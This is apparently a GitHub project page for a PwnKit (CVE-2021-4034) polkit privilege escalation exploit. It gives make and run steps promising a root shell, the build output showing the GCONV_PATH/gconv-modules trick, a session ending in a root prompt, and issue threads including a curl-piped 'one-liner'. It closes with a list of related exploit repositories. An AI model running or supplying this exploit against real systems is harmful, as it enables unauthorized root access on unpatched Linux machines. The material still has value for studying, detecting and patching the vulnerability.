CVE-2021-4034 One day for the polkit privilege escalation exploit

Related tags

Miscellaneous CVE-2021-4034
Overview

CVE-2021-4034

One day for the polkit privilege escalation exploit

Just execute make, ./cve-2021-4034 and enjoy your root shell.

The original advisory by the real authors is here

PoC

If the exploit is working you'll get a root shell immediately:

gconv-modules mkdir -p GCONV_PATH=. cp /usr/bin/true GCONV_PATH=./pwnkit.so:. vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034 # whoami root # exit"> 
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

Updating polkit on most systems will patch the exploit, therefore you'll get the usage and the program will exit:

vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
vagrant@ubuntu-impish:~/CVE-2021-4034$
Comments
  • RFE: Testing instead of actual rooting

    RFE: Testing instead of actual rooting

    What I need is to deploy a safe C binary to detect this CVE . Return 1 code if not already patched without actually rooting the system, return 0 if the system is patched. Can this RFE be added ?

    opened by tjyang 8
  • The value for the SHELL variable was not found the /etc/shells file

    The value for the SHELL variable was not found the /etc/shells file

    GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT” The value for the SHELL variable was not found the /etc/shells file

    This incident has been reported.

    opened by condesings 6
  • One-liner: Use `eval` for the commands

    One-liner: Use `eval` for the commands 

    This will execute shell-scripts that are `curl`ed using current shell.

Fixes the pipe (stdin) problems when executing the ELF, alternatively
using `bash` or `zsh` you can use process substitution.
    opened by owl4ce 2
  • pwnkit: Adds full PATH support

    pwnkit: Adds full PATH support 

    This will take full control of executables on certain Linux systems that
don't use /usr merge as their filesystem layout, for example Gentoo.

    https://wiki.gentoo.org/wiki//usr_move#Current_filesystem_layout https://freedesktop.org/wiki/Software/systemd/TheCaseForTheUsrMerge

    opened by owl4ce 2
  • Not work

    Not work

    ` zanyxdev@xxxxxxx:~/forks_projets/CVE-2021-4034$ ./cve-2021-4034 pkexec --version | --help | --disable-internal-agent | [--user username] PROGRAM [ARGUMENTS...]

    See the pkexec manual page for more details. zanyxdev@xxxxxxx:~/forks_projets/CVE-2021-4034$ pkexec --version pkexec version 0.105 `

    Linux xxxxxx 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64 GNU/Linux policykit-1-doc/stable-security,stable-security 0.105-31+deb11u1 all policykit-1-gnome/stable,now 0.105-7 amd64 policykit-1-gnome/stable 0.105-7 i386 policykit-1/stable-security,now 0.105-31+deb11u1 amd64 policykit-1/stable-security 0.105-31+deb11u1 i386

    opened by ZanyXDev 2
  • Makefile: Force `cp` to overwrite the existing one

    Makefile: Force `cp` to overwrite the existing one 

    This fixes when the permissions of `true` on some Linux systems doesn't
have write privileges, while the permissions are fully preserved by cp.

    On my Gentoo system, coreutils uses multicall, where the content of /bin/true is just a shebang with arguments and no write permissions. This only applies if wants to make again without cleaning it first (one-liner).

    $ file /bin/true
/bin/true: a /usr/bin/coreutils --coreutils-prog-shebang=true script, ASCII text executable
$ getfacl /bin/true
getfacl: Removing leading '/' from absolute path names
# file: bin/true
# owner: root
# group: root
user::r-x
group::r-x
other::r-x
    opened by owl4ce 1
  • Doesn't do anything

    Doesn't do anything 

    ~/CVE-2021-4034 $ ./cve-2021-4034
~/CVE-2021-4034 $ echo $?
127
~/CVE-2021-4034 $ echo $UID
1000

    It neither escalates privileges nor it prints pkexec usage. It just exits with 127 exit code.

    opened by eternal-sorrow 0
  • doesn't do anything

    doesn't do anything 

    ~/CVE-2021-4034 $ ./cve-2021-4034
~/CVE-2021-4034 $ echo $?
127

    I think it's an error related to environmental variables, how can I solve it? If it is not an environmental variable problem, I would appreciate it if you could tell me the cause and solution.

    opened by rioju412 0
Owner
Davide Berardi
Davide Berardi
GitHub
CVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept

CVE-2021-4034 Proof of Concept Qualys researches found a pretty cool local privilege escalation vulnerability in Polkit's pkexec: writeup, tweet. This

Marco Bonelli 20 Jun 22, 2022
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

CVE-2021-4034 PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) https://seclists.org/oss-sec/2022/q1/80 http

Andris Raugulis 933 Dec 22, 2022
This repository contains an exploit of CVE-2021-4034, a local privilege escalation in pkexec

pwnkit (CVE-2021-4034) Privilege Escalation exploit sample This repository contains an exploit of CVE-2021-4034, a local privilege escalation in pkexe

Peter Gottesman 29 Dec 20, 2022
Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation Usage Should work out of the box on Linux distributions based on U

Oliver Lyak 702 Dec 28, 2022
Linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers.

CVE-2021-4034 Exploit Usage $ git clone https://github.com/Anonymous-Family/CVE-2021-4034.git $ cd CVE-2021-4034 $ make [!] CVE-2021-4034 Exploit By w

Anonymous Family 2 Jan 26, 2022
CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still a zero day

WindowsMDM-LPE-0Day Works best on Windows 11 CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still

Exploit Blizzard 35 Nov 9, 2022
CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation

CVE-2021-4034 CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation 根据CVE-2021-4034进行了加强,执行Exploit将会默认添加用户名rooter,密码Hello@World,并且rooter用户将具

倾旋 89 Dec 12, 2022
Local Privilege Escalation Edition for CVE-2021-1675

Local Privilege Escalation Edition of CVE-2021-1675/CVE-2021-34527 Local Privilege Escalation implementation of the CVE-2021-1675/CVE-2021-34527 (a.k.

Halil Dalabasmaz 334 Jan 5, 2023
Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell Exploit for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 437 Dec 31, 2022
A 3-D Printed Bot which can talk, cheer, dance and manage your day-to-day schedule.

cheerup A 3-D Printed Bot which can talk, cheer, dance and manage your day-to-day schedule. In childhood many of us have watched this show "SpongeBob

Aniket Dhole 4 Sep 5, 2021
CVE-2021-4034 POC and Docker and Analysis write up

CVE-2021-4034 POC and Docker and Analysis write up

breeze 9 Oct 22, 2022
Proof of Concept (PoC) CVE-2021-4034

PwnKit-Exploit CVE-2021-4034 @c0br40x help to make this section in README!! Proof of Concept debian@debian:~/PwnKit-Exploit$ make cc -Wall exploit.

Luis Javier 60 Nov 10, 2022
PoC for cve-2021-4034

cve-2021-4034 PoC for cve-2021-4034 Based on the PoC by https://haxx.in: https://haxx.in/files/blasty-vs-pkexec.c. Probably he's https://github.com/bl

Michael Schmid 3 Jun 19, 2022
Pre-compiled builds for CVE-2021-4034

CVE-2021-4034 Precompiled builds for CVE-2021-4034. Of course you shouldn't trust precompiled builds :) This release works slightly different: first a

null 13 Dec 27, 2022
Plex media server local privilige escalation poc - CVE-2021-42835

Local Privilege PlEXcalasion - CVE-2021-42835 Plex Media Server for Windows prior to version 1.25.0.5282, vulnerable to Time Of Check Time Of Use (TOC

null 6 May 24, 2022
PoC (DoS) for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell DoS PoC for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 437 Dec 31, 2022
Bring your own print driver privilege escalation tool

Concealed Position Concealed Position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Spec

Jacob Baines 213 Nov 19, 2022
SystemGap - Maintenance Tools after privilege escalation

SystemGap 适用于解决不稳定Windows漏洞提权成功后进行权限驻守的办法 SystemGap - 监听者 SystemGap 负责监听一个任意用户可读写的匿名管道,从管道中读取命令进行执行 SystemGapClient - 发送者 SystemGapClient 负责向匿名管道中传入指令

倾旋 39 Nov 9, 2022
Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.

RemotePotato0 Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin. RemotePotato0 is an exploit that allows you to escalate

null 1.1k Dec 28, 2022